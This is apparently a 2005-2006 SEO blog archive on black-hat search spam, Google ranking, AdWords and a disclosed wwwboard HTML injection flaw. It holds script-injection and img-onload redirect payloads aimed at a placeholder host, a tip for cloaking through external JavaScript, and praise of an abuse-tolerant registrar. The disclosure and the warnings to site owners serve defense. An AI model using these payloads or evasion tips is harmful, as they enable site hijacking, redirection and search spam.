To me this is exact portrait of russian-speaking schoolboy/girl making his/her first steps in black hat seo. And there are many of them visible in the winter SERPs. Looks like the concurrency for their traditional industries (weight loss, stop erectile dysfunction) had jumped so high so they have moved to other (not only gambling, btw) industries... Who will be next?

Google Analytics: full referrer howto.

2006-01-03T13:42:00.000Z

Google Analytics is a great tool. But it's documentation is seo-unfriendly to me. E.g. I was unable to find any hint how to see full referrer in almost two months! Coupled with the fact that first two google 's SERPs for 'google analytics +"full referrer"' contains only comments about how sad that GA doesn't allow you to see full referrer (good example is current #1 for this query) or just unrelated material it had forced me to believe that this is impossible.

Today I've learned that even msn search could be usefull sometimes (for an ordinary user ;). The same query against msn returned me usefull information at #3. Read google analytics full referrer explanation comment at the end of the post. It is not so elegant as I'd like it to be but Marketing Optimization > Marketing Campaign Results > Referral Conversion path will allow you to fetch full referrer!

Reinclusion request [google #42785312]

2006-01-03T11:26:00.000Z

I have filed reinclusion request for google's Q&A team (according to matt cutts reinclusion request howto):

1) About one week ago I discovered that my site lost all known to me postions in google serps.

2) My site hosts on blogger's .blogspot.com. About two weeks ago I changed archive mode for my blog from monthly to weekly, but blogger had not deleted old months archive pages after that (e.g. rathamahata.blogspot.com/2005_12_01_rathamahata_archive.html is still there) and it is impossible to delete them manually. Inspection of the google index shows me that those stale monthly pages are still in it. There are some rumors about google's duplicate content penalty and I feel that my case could easily feet in some of them. I should note that those monthly pages don't have any backlinks pointing to them neither from my own site nor from any other. Those pages have never been mentioned in any sitemap or rss/atom feed. So I think that in case of reinclusion those pages will not be indexed at all - and I think that this is correct way to prune those stale pages from google's index. There is also possibility that problems like mine should be solved by blogger/blogspot.com team but I'm not sure about this.

Thank you.

Their mail robot have just replied to me and shows that my assigned request #42785312. Will see how long it will take... I'll inline any additional details in this post when (and if) they will appear.

The theory and the practice of google penalty (white hat vs black hat).

2006-01-02T14:37:00.000Z

Comments of the white hats on my previous post show me that they believe that google penalty in couple with a google secret forces tactic affects mostly black hats and in turn mostly harmless for a white ones. From my experience it is exactly opposite. Need a practical example?

About one week ago I discovered that the blog you read right now lost all known to me postions in google. The reasons of this are still unclear to me. This can be a google algo change, changes in their index (for pages from the others sites), just normal algo behaviour or some kind of a penalty. Only google knows for sure. Is there a possibility of a penalty? I think there is. About two weeks ago I changed archive mode for this blog from monthly to weekly, but blogger had not deleted old months pages after that (e.g. rathamahata.blogspot.com/2005_12_01_rathamahata_archive.html is still there) and due to my blog hosts on blogspot it is impossible to delete them manually. Inspection of the google index shows me that those monthly pages are still in it. There are some rumors about various google's duplicate content penalty and I feel that my case could easily feet in some of them. What should I do next? If there will be a possibility to check if penalty exists for sure it will be easy to point blogger team to this issue and ask them to fix it. But I don't have this possibility. Even if there is no any penalty at all my unabillity to check it forces me to theorize and so wastes my time (as a white hat webmaster).

And even from the theory point of view google penalty is more white hat's problem than a black one. Especialy for content related things. Pure black hats could apply whole methodology strength to any problem. Their content creation speed is limited only to the power of their datacenters (yeah not only google have such :). So it is possible to setup in parallel as many experiments as they need with a proper variables control for each experiment. Please have in mind that SEO experiments are rather long so ability to run them in parallel is a key feature to win. In a white hat case - peoples don't scale. End of story.

Black hat's black list.

2005-12-31T21:21:00.000Z

I'm tired of google secret forces tactic. Read my comment on matt cutts recent post. Imagine a secret force that is allowed:

To decide who is guilty.
Apply repression over that person.

To me that is exactly how google penalty works. It doesn't matter how white hat do you think you are. Googlers always know better - even if they couldn't prove that to any on demand.

I believe that all persons involved in contatcs with secret forces should be named. So here is mine pesonal black hats's black list. I believe that it could be useful not only to black hats but just to any SEO infected person puzzled about exact google's black hat definition. Current version is very short (it is kinda proof of concept). I'll update it from time to time. If you have any suggestion about entries I should add please drop me an email.

Massive wwwboard trampolization example.

2005-12-30T07:59:00.000Z

Damn! spam have just mentioned wwwboard as an example of masive trampolization. I've got a news for you - it was expected. Wwboard allow <script> insertion in their new message body and that was broadly known(google for it) since I believe 2003. Some time ago I discovered that wwwboard allows to inject javascript code into a parent page (via `Subject' field). I have to say that wwwboard is just only one example of old abandoned code all over the places here and there in the internet. Besides anchient strange scripts like matt's ones there are also some home-grown engines used at particluar web site. Need an example? Good one is yahoo groups and <iframe> by spamhuntress. Another one is xanga.com. I've just found that it vulnerable to onLoad attrubute of <img> tag (see my previous post about other possible traffic redirection tricks.)

The rule is - if there is an old unpatched/unmontained (but still working) code on an old resourse that allows third peoples to add content, and there is nobody looks at it as administrator - it will be trampolinized.

Proxies terminology.

2005-12-29T19:13:00.000Z

I found that proxies terminology used in black hat seo (and other spam types) differs from the common one. Here is a list of most obviouse cases:

Allmost every time black hats speak only about http proxies, but use just single proxies keyword. There are different reasons for that.
1. Http ones are the biggest type (others are to small compared to it).
2. It is easy to tunnel everething over http (and of course over any other protocol :)... I remeber smtp spam (mail spam) days when a cheap php web-hosting was successufly used to send mail spam via http proxies to hide actual source. Btw, that kind of proxies custom protocol => http => php (or any other server side script) => any protocol should still work on many cheap hosting setups.
For black hats open is not an attribute of possible user scope (all internet users) but rather a method proxies was obtained. There are two possible methods known to me:

Reverse check all log entries of an alive http server(s) with a huge userbase (where data from log entry we need is ip:port pair.). Ports to check should include common proxies ports (80,8080,etc...). This part could be called "open".
Make a new proxies. Bot nets. Bot nets are rather old, they have been in use for smtp spam for ages.

In their tune all proxies , no matter how they were obtained, could be classifed on how they will be visible to the outer side (to the victims).
1. Transparent proxy - pass enough information (i.e. real client IP address) in at least one of the headers, no matter which one (good examples are HTTP_FORWARDED_FOR, HTTP_X_FORWARDED_FOR, CLIENT_IP... but don't forget how creative humans could be :). This type is mostly useless for a direct usage.
2. Anonymous proxy - Allow victim to know that http query was issued using proxy (e.g by Via: header). But either don't show any IPs at all or show a faked one (different from the real client IP address.). Black hat's work·horse type.
3. Elite proxies - don't pass any info (i.e. any header) that will allow victim to know that this is not a regular but via-proxy request. In my experience they are not more than 10% of anonymous. The best of the possible types.

Russian SEO flags.

2005-12-27T18:43:00.001Z

I spended almost half of not related directly to work time of this day thinking about what flags I want to have on the wall in front of me.

First two came very fast:

Flag of Israel.
And Ichkerian one .

Don't ask me - Why? It is Russia. It is SEO.
But there was still far to much empty space...
I remebered suitable third only around end of the day. It was South Africa flag. This time I even have an explanation for you. In russian language south africa's `.com' analog `.co.za' domain zone sounds like female goat. Very funny `.com' visualization to me. I see them every time I found those *.co.za in the SERPs. Third one is completely out of order with the first two... That was exactly what I need!

SEO (as a main job) is a tolerance conversion tool...

Registrar's tolerance (Bullet proof registrars)

2005-12-23T08:44:00.000Z

Is registrar bullet proof (it is funny that in russian seo translation it sounds like "abuse proof" :) or not? - is a greate example of SEO only problem for the time being but in fact it is far wider (this is just one particular case of economical repression over legal opposition to the fanatic's point of view).

I used to think that there is no possibility to win over gandi registrant.

They have nice spam chapter in their documentation neither I nor (I think) Mahatma Gandhi have got something against.
Their web interface is so geek friendly.

But I found that their tolerance extends far too wider than I expect. They tolerate your technical problem reports just as easy as they do that for webspam reports. And there are far to many random errors they don't understand happens on their side.

The first sign that there is something better appeared when I discovered spamhuntress mentioning moniker registrar. I tried moniker for the first time. My view have just been finaly changed by WebGuerrilla's comment on moniker registar. Moniker is the winer.

Blocked words/phrases for AdSense?

2005-12-22T09:52:00.000Z

It is known that many ppc companies don't accept some traffic (like CP) due to either legal or ethic related issues. It seems that google's AsSense has the same feature. I.e. it blocks non PSA ad units for some content. I came to this conclusion after I found that for this post it is imposible to see ad units others than PSA no matter from what geo location you come from. I've just checked a list of possible PSA reasons and haven't found any reason that could apply in my case...

I don't know what particular attribute of my content triggered a block from AdSense.

The seo view on belgium free domain registration offer.

2005-12-19T20:44:00.000Z

At the begining of November 2005 Belgium launched their free second level domain registration offer. I remeber when I first heard about that from the friend of mine I said that the first visible effect of that (besides just .be size increase) will be a massive increase of doorways domains ratio over all new belgium domains. He had answered - "Yep! One of my affiliate have already sent me list of his 200 .be new domains last day!".
Here is the first fact - spamhuntress has said about webspam related belgian domain.

She also mentioned `whois privacy' thing and this is funny, she is at least second antispammer did that in last week I know of. Yes, hiding of a personal data is a default option for a two registrants invloved in .be offer I checked (haven't checked more)... but in general case it doesn't matter because many registrants doesn't check your input data (and this is understandable), therefore black hats are only required to type something that human readable and imposible to refuse after 1.5-second registrant's employee look (if registrant ever do that)...

Java bot from google.

2005-12-18T02:10:00.000Z

I've just noticed some very interesting to me entry in the one of my http servers log.
66.102.15.83 - - [18/Dec/2005:01:11:32 +0000]
"GET /set/ HTTP/1.1" 200 14013 "-" "Java/1.5.0_02"

This IP belongs to google:

rathamahata@arise:~/$ whois 66.102.15.83

OrgName:    Google Inc.
OrgID:      GOGL
Address:    1600 Amphitheatre Parkway
City:       Mountain View
StateProv:  CA
PostalCode: 94043
Country:    US

NetRange:   66.102.0.0 - 66.102.15.255
CIDR:       66.102.0.0/20
NetName:    GOOGLE-2
NetHandle:  NET-66-102-0-0-1
Parent:     NET-66-0-0-0-0
NetType:    Direct Allocation
NameServer: NS1.GOOGLE.COM
NameServer: NS2.GOOGLE.COM
Comment:
RegDate:    2002-07-03
Updated:    2003-08-13

RTechHandle: ZG39-ARIN
RTechName:   Google Inc.
RTechPhone:  +1-650-318-0200
RTechEmail:  arin-contact@google.com

OrgTechHandle: ZG39-ARIN
OrgTechName:   Google Inc.
OrgTechPhone:  +1-650-318-0200
OrgTechEmail:  arin-contact@google.com

# ARIN WHOIS database, last updated 2005-12-16 19:10
# Enter ? for additional hints on searching ARIN's WHOIS database.
rathamahata@arise:~/$

It is interesting is it something like googles's "20 percent time" for pet projects for aprox. 1 google engineer or a regular bot? In case of the second it is interesting why it has default (and so non-informative) USER_AGENT?

Update:
I found that java bot hadn't fetched robots.txt at all. So I doubt that this is a regular bot...

tbping - trackback ping utility.

2005-12-17T22:19:00.000Z

My seo tool set blog have just celebrated first real post. Read about tbping - trackback ping utility (aka trackback ping standalone cli tool).

MSN search engine is down.

2005-12-17T09:35:00.000Z

It looks like that msn se is experiencing problems as of time of writing. E.g. search against `seo' like this one permanently returns an error like:

An error occurred while processing your request.

Reference #102.1952a1d5.1134812305.142e8b0

MSN is the most unstable search engine to me that also brings much less traffic than either google or yahoo. I think that there is only one group of peoples that could intentionlay choose msn over others. It is seo. Why?

It is somewhat faster that yahoo in terms of crawling.
It doesn't filter out some backlinks (like google seems to do) for `link:' query prefix.
It's SERPSs look close to an ancient google. Orignal PR algo (I think that msn's implementation is very close to original google one) seems to be main factor for positioning in MSN... And this is good (for seo).

Insight: Future PageRank.

2005-12-14T20:24:00.000Z

Not so long ago I criticized over peoples using non-existant (void) to me term `future pagerank', suggesting to use current pagerank instead.

While I still think that `current' is more correct in this particular case it doesn't automaticaly make `future' to be void. What is the best name for current pagerank fetched from the current google test datacenter to you? For me `future pagerank' is the most natural in this case.

See an example:
At this particular moment of time for this site:

Google toolbar PR is 0(zero).
For november 14, 2005 it was 2 (see already mentioned post).
Current one is 4.
And finaly Future PageRank is 5.

Note: All measured values have just been taken in the moment of writing and may actualy differ if you would like to test them again in future.

False-positive splog detecion on blogspot.

2005-12-12T12:12:00.000Z

Update 20051213 20:03 (GMT): 34 minutes ago blogger send me an email [#336553] with a notify that I have been verified. Tnanks blogger! I can can conclude that web-spammers will have at least 3 days. But I think that verify requests have a priority over "silent" possible splogs so 3 days is a low margin. My black hat sources in seo said that it is not lower than 7 days...

This blog was wrongly detected as splog by blogger as of Nov 10.
Your blog requires word verification
...
And below is an invite to turn that verification off (buy sending request for a human review):
Remove word verification from posts

Now it requiries "word verification" procedure for every my post creation/edit, but not for commenters - this is so funny. It is possible that it was triggered by `adult' keyword I used within previous post/title. It was used as a short name for one of the industries in an ordinary seo post. But I don't know any reference to description of blogger's splog detection system - so I'm not sure...

I did a request for a review at the same day. Nothing has changed since that.

Does anybody know how long it can take them to review it? What is the ratio of false-positive cases for blogger?

Any comments (on topic) are appreciated.

P.S.
It seems that blogger doesn't have "remember status" feature on review request. There is no possibility to know if it have been already sent and (if so) to know status of it.

Dynamic DNS: adult vs. other industries.

2005-12-10T17:52:00.000Z

Damn Spam! has shown a good example of a fact broadly known to a SEO guys/girls but not for the others.

It looks like dynamic dns (aka dyndns) services usage in adult industry is much wider than for any other industry. The adult seo is the most old and professional part of seo. Dynamic DNS costs money (actual price is very cheap but still) - that prevents beginners/kids from using it. At the same time dyndns are kinda bullet-proof solution for a black hat seo, they are either don't respond to abuses at all or do that extemely slow.

*.dynu.net (mentioned by DamnSpam!) comes from www.dynu.com - classical dyndns service (that one does resolve and has http server).

OpenID - how to prove that URL is under your control.

2005-12-09T12:41:00.000Z

One of the reason of trampolines problem is the situation when the owner of a target page (one where spammy backlink is placed. e.g. blog) doesn't have a way to check that beneficiary page (page got positioned in search engine) owner is an actual beneficiary (i.e. it intentionaly earns money from it). It seems that OpenID is a good work targeting the same pronlem. In most flexible case it allows to prove your ownership by inserting couple of <link> tags in <head>.

Unfortunately openid it still new (to me) and haven't appeared widely yet. In my own tests I wasn't able to comment on my friend's blog (livejournal one) using this blog url as identity and openid.imperialviolet.org mentioned on openid servers page as one that "allows anyone who can edit HTML to have an OpenID identity" as openid server...

Click fraud problem affects Google's AdSense just as others PPC concurents.

2005-12-04T13:42:00.000Z

It seems that many peoples often forget that Goolge's AdSense as just immune to the click fraud problem as other PPC engines. Damn Spam! has posted an english comment on a click fraud incident (deutsch). You can change `s/AdSense/some other ppc program/g' all over the place - probability that this may happen is not any different. AdSense is just biggest and most known and so it's reports are more visible.

I should note that this (common immunity to click fraud) is not only apply to incidents that have occurred (registered) but also to many imaginable exploitations.
E.g.

Imagine person wants to get cheaper price/bid (as clicks buyer) than a real market price.
She/he starts click fraud campaign against that bid.
Convertion rate for other/fair buyers of that bid goes down (false clicks will never become buyers, they need to be alive for that).
Bid starts to fail. This is exactly what person expects.

All PPCs (and AdSense is not any different in this respect) are possible victims of such attacks...

Bypassing the results limit of search engines.

2005-12-03T18:18:00.000Z

While this is not an issue for an ordinary users for SEO it is not enough to have only first 1000 (google, yahoo), 500 (msn) or 200 (ask jeeves) results for a given query. The solution (actually a workaround) for this problem is a usage of search engine's opeartors (e.g `+').

Imagine query `keyword' that has more that 1000 results (I'll use google as an example). In this case results of any query `keyword + $SALT' (where $SALT is a random word taken from a dictionary) will be a subset of keywords's results. But the limit for a subset is still the same (1000). So by issuing enough ammount of queries like this (where a dictionary of $SALT is chosen correctly) you will be able to fetch _all_ results. All you need after that is to merge susbsets and delete duplicates.

P.S. That method works for good enough in my internal tests for google. There are no reasons preventing it from working for you with any SE.

Wwwboard html injection vulnerability.

2005-12-02T07:38:00.000Z

About one month ago I discovered a bug in wwwboard. At that time I decided not to release any details (even application name) until any response either from author or CERT. Haven't seen responces from the both so I decided to go public. Below is extractions from my email to CERT:

Please describe the vulnerability.

If you put something like next string:
<script type=text/javascript src=http://example.com/script.js
In the `Subject:' field of wwwboard's `Post A Message!' form - you will see the next message in the logs of example.com http server:

XXX.XXX.XXX.XXX - - [04/Nov/2005:19:02:17 +0300] "GET /script.js%3C/a HTTP/1.1" 200 3 "http://example.com/wwwboard/wwwboard.html" "-"

What is the impact of this vulnerability?

What is the specific impact:
Its easy to map `/script.js%3C/a' to any name on your server via e.g. mod_rewrite. All browsers I've checked (IE, Mozilla/Firefox,Konueror) are happy to execute such js.
How would you envision it being used in an attack scenario:
Webspammer could insert javascript redirection code in the any page of wwwboard that allow comment. After that it can webspam for this page for death (to get it positioned in search engines) creating a problem for domain name owner (like get banned/penalized from google). Once positioned users from search engines will go to the webspammer feed host.

Problem of the month: Tamiflu partner program.

2005-12-01T12:40:00.000Z

It looks like that google's AdSense (for a white hat) and ppc (for a black one) will become the best traffic utilizing tool for tamifly in a days (If it haven't became so already). It is getting worse every other day. About two weeks ago situation was next: once you started to send traffic to some partner from the 1st SERP any of "Big Three" - expect it will sell all tamifly it had in two days. Now it is allmost imposible to find those that still have had it. It seems that paranoya is the best stimulus for buyers. Mass media spent to many time talknig about how dangerous bird flu can be in the last three months...

Snippet for a trampoline. Where to place a tag.

2005-11-30T22:03:00.000Z

I've just discovered that google accepts description meta-tag (i.e. extract snippet from it) not only placed in <head> but just any first <meta> within document - no matter where it placed (even in in <body>).

It used to be that preventing <head>'s parts from modification made trampolinization of a free resosouse less probable. To get highest clicks from SERPs rate webspamers are required to have readable (by humans) snippet. That may not be possible if description is out of webspammers control. In this case google for example can extract phraces for snippet allmost from any text within document (in some cases it can do so even when description is exist, but that is a differents story). And that would require from webspammers to make all their content to be readable (by humans), not only short description. So by limiting control over description you were able to affect snippets and so to prevent some webspam (black seo guys will prefer ones that don't rather than you). It is not effective anymore in case when you just don't have any description in <head>. In this case webspammer still could insert his/her snippet - and google will eat it in most cases.

Google traffic estimator (without an actuall AdWords account).

2005-11-29T16:44:00.000Z

Update 20051212: It seems that googlers changed AdWordrs interface about a week ago so currently description below is not apply (e.g. they have removed "Add Selected Keywords" that allows your to add to traffic estimator all keywords at once. Since AdWords doesn't require money to signup I suggest you to sign up for their account (tnen use Tools > Keyword Tool/Traffic Estimator).

Traffic estimator (any of them not only google's one) are one of the base tool for any SEO professional. It allows you to know:

What ammount of traffic you could expect for fixed position from within SERP for particular keyword.
How much that trafic costs.

Items above are to abstract, concrete details comes from particular traffic estimator.
Here is a concrete description for google traffic estimator.

The one of the features not mentioned in the link above is that it is not actually require AdWords account.

Here is an example of exact steps anyone need to use google's traffic estimator without AdWords account for `texas holdem' & friends keywords.

Go to the Google's AdWords.
[AdWords home]
Click on the Click to begin button (located in the right side of your screen).
[`Target customers by language' and `Target customers by location']
Select English for Target customers by language
and Countries and territories for Target customers by location. Actually there was no need to select anythng in my test. That was a default vaules. Push Continue > button (located in the bottom-left corner of your screen).
[Target customers by country or territory]
I selected All Countries and territories. I also removed Russion Federation (but just for expiriment validity).
[Create an ad]
This one may seem a bit harder (i.e. requiere thinking procces) Do not forget that AdWords disallow some keywords to appear in Ad unit. But smart google have already provide all for think-free cut'npaste method. Look at the top-left corner (I mean nice looking Example short ad: ). Use it as-is to fill your fileds: E.g.
Headline: Luxury Cruise to Mars
Description line 1: Visit the Red Planet in style.
Description line 2: Low-gravity fun for everyone!
Display URL: www.example.com
Destination URL: www.example.com
Well done. Second Continue >

[Choose keywords]
You can either type all particular keywords you know or allow google to suggest you
many keywords by issuing just one example. I choosed follow the google's suggestion and entered texas holdem in OR - enter a keyword below to see relevant results from our Keyword Tool. It gave me yet another 10 texas holdem's friends keywords. There was possibility to further extend keywords list by View more keywords and I did this. This finaly gave me following list of keywords:

texas holdem
texas holdem online poker
texas holdem rules
texas holdem poker
texas holdem strategy
how to play texas holdem
online texas holdem
play texas holdem
texas holdem online
texas holdem odds
poker texas holdem
limit texas holdem
texas holdem game
texas holdem games
no limit texas holdem
texas holdem tips
texas holdem hands
texas holdem download
texas holdem tournament
texas holdem hand
texas holdem calculator
texas holdem poker rules
texas holdem tournaments
texas holdem poker online
download texas holdem
texas holdem software
online texas holdem poker
texas holdem table
texas holdem odds calculator
play texas holdem poker
play texas holdem online
learn texas holdem
rules of texas holdem
games texas holdem
internet texas holdem
texas holdem strategies
turbo texas holdem
texas holdem poker games
rules texas holdem
texas holdem play
rules for texas holdem
texas holdem starting hands
texas holdem poker hands
best texas holdem
aces texas holdem
texas holdem betting
texas holdem poker game
texas holdem downloads
texas holdem tables
texas holdem sites
texas holdem freeware
texas holdem for mac
texas holdem no limit
how to play texas holdem poker
texas holdem poker table
texas holdem com
texas holdem mac
texas holdem flash
mac texas holdem
texas holdem for fun
playing texas holdem
holdem texas
tiks texas holdem
texas holdem secrets
texas holdem hand rankings
texas holdem chips
casino texas holdem
texas holdem on line
texas holdem books
texas holdem how to
texas holdem no download
texas holdem cheat
texas holdem poker tips
freeware texas holdem
online poker texas holdem
flash texas holdem
texas holdem crack
texas holdem pc
odds texas holdem
texas holdem winning hands
texas holdem blinds
pc texas holdem
texas holdem hand odds
texas holdem bonus
texas holdem computer
texas holdem instructions
strip texas holdem
tik's texas holdem
texas holdem poker download
texas holdem card game
texas holdem offline
texas holdem poker tables
texas holdem statistics
pocket pc texas holdem
texas holdem tournament rules
deal texas holdem
texas holdem video
texas no limit holdem
texas holdem forums
learn to play texas holdem
poker rules texas holdem
telltale texas holdem
rules to texas holdem
www texas holdem
no limit texas holdem poker
texas holdem poker odds
texas holdem hand ranking
poker texas holdem rules
texas holdem pc game
texas holdem tutorial
las vegas texas holdem
texas holdem betting rules
texas holdem how to play
heads up texas holdem
texas holdem card games
texas holdem party
texas holdem practice
how to deal texas holdem
winning texas holdem
on line texas holdem
texas holdem rule
texas holdem pocket pc
no download texas holdem
texas holdem cards
texas holdem strip
texas holdem websites
texas holdem casino
texas holdem percentages
texas holdem poker strategy
texas holdem heads up
texas holdem poker set
downloadable texas holdem
palm texas holdem
texas holdem terms
tournament texas holdem
no limit texas holdem rules
yahoo texas holdem
texas holdem calculatem
texas holdem flush
texas holdem for palm
texas holdem palm
offline texas holdem
how to win at texas holdem
texas holdem cheats
texas holdem guide
pogo texas holdem
texas holdem online games
texas holdem poker sets
texas holdem probability
practice texas holdem
texas holdem game download
dealing texas holdem
texas holdem advantage
texas holdem java
texas holdem poker sites
tips for texas holdem
how to win texas holdem
texas holdem strip poker
download texas holdem poker
rules of texas holdem poker
texas holdem cheat sheet
texas holdem hints
texas holdem official rules
texas holdem online game
texas holdem flash game

I chosed all of them by clicking sequentaly on Select All and Add Selected Keywords buttons. Third Continue >

[Traffic estimator]
Actually a link for it View Traffic Estimator located near a bottom of the screen.

Here is top 10 keywords:

Keywords	Avg. Position	Clicks / Day	Cost / Day	Avg. CPC	Status
texas holdem	1.0	250.0	$436.06	$1.74	Active
texas holdem poker	1.0	59.0	$132.37	$2.24	Active
texas holdem online	1.0	13.0	$28.87	$2.22	Active
play texas holdem	1.0	8.2	$14.00	$1.71	Active
texas holdem online poker	1.0	7.5	$20.40	$2.72	Active
texas holdem rules	1.0	7.0	$13.08	$1.87	Active
texas holdem game	1.0	5.6	$7.68	$1.37	Active
texas holdem games	1.0	4.3	$5.95	$1.38	Active
texas holdem how to	1.0	4.3	$6.65	$1.55	Active
texas holdem odds	1.0	4.1	$12.05	$2.94	Active

Neither user agreement aceptance nor any personal data (like name, email, etc) are required to fetch this data.

Advises for SEO from external world

2005-11-24T09:11:00.000Z

There are many advises comes from non-seo world to black seo one. Some of them are rather common. I found very good and polite example of those on spam chongqing. I have so many comments so I prefer to put all of them here:

"Why waste time thinking of text to try to make your spam look real... There really is no need to fill up the comment with stupid text. ..."

There are. There are different rumors in SEO. One of those is that one attribute of the link is it's thematic (very wide term). And so a link is either thematical or not. Thematic context goes from the content around of a link. Good example of facts behind that theory is expert pages (aka hilltop) paper. This document call content "scope qualifies ... url". Nobody in the black seo world knows how really sophisticated real algorithms are. So some of them use readability (sort of) as a quality test. Another two popular rumors are: the less unique content is - the worse for search engine) and the more content looks like written by human - the better (for a search engines). To be short: search engines' angle of view differs from the alive user one and for black seo the last one doesn't matter (alive users will go to the feed for money). So even in case when it looks like to be done for humans it oftenly done for machines.

"...One spammer seems to have figured that out. I just got a spam comment where the entire comment was five short linked key phrases each on one line."

It is called map (map of backlinks). They exist since the very early webspam times. They are not so popular anymore at least for google. Due to the reasons I wrote above.

"I also wonder why spammers keep hitting the same sites over and over within a short period. That makes their spam more obvious and annoying."
If posting and beneficiaries (doorways, trampolines) creation subsystems of webspam system is fast enough - than one of the possible tactic is to create and spam beneficiaries in parallel and ignore ban problem at all. If beneficiary earns much more moneys than it costs - nobody cares. Many spamable engines have a pager (next/previous/last...) so post/links/etc slowly migrates from one page to another (or just all new posts go to the new page). So actually there is a possibility for webspammer to get backlinks from the different pages of the same resource. Other possible case is a situation where webspammer is to lazy and have small collection of spamable targets. All different cases are not so far from plain programmer errors.

Google Base: Yet another trampoline from google.

2005-11-16T10:33:00.000Z

Yesterday google launched Google Base. It has so many nice features like:

Many fields for text (title/description/etc).
Accepts even google banned domains.
Doesn't put any restrictions on user supplied backlink (like rel="nofollow").
Searches will be indexed by search engines (it's robots.txt doesn't disallow any agent for /base/).
Bulk uploading - this one is especially usefull for webspammers (it will speed up their postings.)
Last but not least: *.google.com domain.

It seems that is not possible to inject javascript into it, but of course banners are still possible and (due to the fact of non-resticted backlinks) PR transmition to webspammers' feeds is also possible in theory.

I afraid that it is only matter of time when we start to see urls like http://base.google.com/base/search?q=... with spammy backlinks in the top serps of different search engines. That had already happened for blogspot - there are thousands of blogspot's splogs in msn's and (far less, but still...) yahoo's serps.

The connection between javascript & black SEO.

2005-11-15T19:28:00.000Z

About a two month ago when I opened javascript language manual (Mozilla version) for the first time I screamed:
"It is a language of the future!"
"The language of the black SEO one future...", one friend answered.

My first reaction was a believe that any javascript should be hardly penalized by search engines in a near future ("no more than half an year!").

Now it clearly visible that this is not possible. Javascript is tightly integrated in so many of the current big sites (including many Google's ones)... Search engines don't even check external javascripts. After all - while so many of webspammers are actually using javascript it doesn't automatically means that most of not so clear javascripts belong to black SEO. So, currently for all free resource's owners affected by trampolines problem - it's only their problem.

Here are two suggestions to them:
1.) Do not forget that filtering out just any <script> tag is not enough. Any of events related attributes of html tags could trigger javascript. E.g.
<img src="/spacer.gif" onload='javascript:document.location="http://example.com/";'>
Will redirect your to webspammer feed. I've already found couple of such examples in serps in the last 30 minutes (will write email with notice to them right after I will wake up). I guess that there are more than a couple.
2.) Even if there is no any possibility for enemy to trigger javascript from your resource pages, but thouse pages still allow editable backlinks - webspamers could still have had a chance to earn money from them. Either by:
a) Putting a banner for their trackers/feeds. Conversion will be lower than for a direct redirect, but not so much, especially if your pages are much easy to position than any others.
b) Putting a backlink for their doorways to increase their PageRank. That can be done either in parallel with trampoline positioning, or a bit after (to avoid abuses for doorways).

Current (future for toolbar) google's PageRank.

2005-11-14T19:04:00.000Z

I don't know of any people involved in SEO unfamiliar with google's PageRank (see original paper describing PageRank). One of the fact known to most I know of is (better say that it seems to be fact to them):
PageRank that any ordinary user allowed to see is a kind of snapshot value taken sometimes in the past (happens about once if three months).

I found that this is not true. First, I started with simple future pagerank keyword against google (instead of current... - this is a good example of how stereotypes can affect humans). That gave me this prediction tool. According to description it ... hmm, tryes to predict future PageRank. For my seo blog (you are reading it) it predicted that it PR will be 2 in future and suggested me to check it via this url. I haven't found any info about it's response format. But after I'd removed last parameter (`features=Rank') I got simple xml feed that I found interesting. It seems that according to RK tag description in Google's Search Appliance docs it contains current value of PageRank for this blog (yes, I tnink that RK corresponds with original PageRank)!

Vulnerability report by third party.

2005-11-04T17:21:00.000Z

For the second time in my life I found a bug which looks like a vulnerability. While for the first time it was purely theoretical (and even if theory was true the affected userbase was rather small) the last one seems real to me and affected user base seems to be wide (sorry, I can't add more details at this time). So I've faced with a problem: what exact steps should be done by person discovered vlunerability in case when he/she not affilated with any security team?

The first step seems clear: privately contact with the author/vendor - have just done that (an email have been sent). The question is - what should I do next? For the time being I plan to contact CERT (subjective choise) if I will not receive any objections against that from the author soon.

While I don't see any partucular problem with the current plan I'm still not shure that this is the best one. Any suggestions are welcome...

P.S. I will add more details about vulnerability as soon as I will think that this is safe.

Update: 20051106 10:23 (GMT)
Mail to CERT have just been sent.
Update: 20051202 08:40 (GMT)
Haven't got any responce either from author or CERT. Details have just been posted public.

External javascript is very useful for cloaking.

2005-10-27T07:48:00.000Z

I've just discovered that no one of known to me search engines's crawlers (Googlebot, Slurp, Msnbot, Teoma Crawler) check for content of external javascripts. E.g for this code:
<script type="text/javascript" src="http://example.com/cloaking.js"></script>

you'll see that http://example.com/cloaking.js will never be actually fetched (and so will never get further checks) by crawlers bots. Seems to be very usefull for trampolines, where javascript oftenly is the only one possible tool to do cloaking tricks (including but not limited to redirects).

Multiple dashes in domain name. Google bug?

2005-10-26T07:19:00.000Z

I've just discovered that google doesn't correctly work with multiple dashes in domain names. At least this is true for their site: search prefix. See e.g. site:online--poker.com. As you can see that answer actually belongs to online-poker.com, not to online--poker.com. Both of yahoo and msn are correct in this regard.

Ongoing google's Jagger update glitch

2005-10-20T15:29:00.000Z

I think that something goes entirley wrong with ongoing Jagger update. Look at the msn index page - it's PageRank is 2!. Another issue is that many sites that have very little count of external links (2-3) of low quality got PR of 4-5. I think it will be rolled back in a couple of days ...

Doorways has been depricated by trampolines in black seo world?

2005-10-16T18:18:00.000Z

It looks like that seo guys (ordinary humans calls thouse guys spammers, but I personally don't like that name due to legal aspect - it already belongs to e-mail industry I think) targeting google has changed their methods from positionin doorways (sites created for search engines, not for alive users) to trampolines (pages on some host doesn't belongs to a positioner that allows him/her to earn money from if page is positioned). In most cases trampoline is `free resourse' (free hosting/blog/guestbook/forum/wwwboard/etc...) that allows to inject javascript code into it. If you'll check medicine serps right now you'll find dozens of such trampolines. e.g. see: `cheap phentermine'. It looks like the reason of the current situation is a google ban feature - feature to a seo guys, not for ordinary users. It seems that currently google is not able to determine who is really beneficiary of massive backlinks creation (when javascripts comes to a play the benefficiarry is not so clear from the fast look). And, due to the facts that google seems to allow far large backlinks count growth rate for an old domains then for a new ones, trampolines pages happens to be very easy to position currently. Remember that there are plenty of old and white (in terms of seo) free resources. So there is a hole. I'm puzzled what will be a solution for this problem from google? Per page (only per host ban exists currently) ban or something entirely different?

Headline:	Luxury Cruise to Mars
Description line 1:	Visit the Red Planet in style.
Description line 2:	Low-gravity fun for everyone!
Display URL:	www.example.com
Destination URL:	www.example.com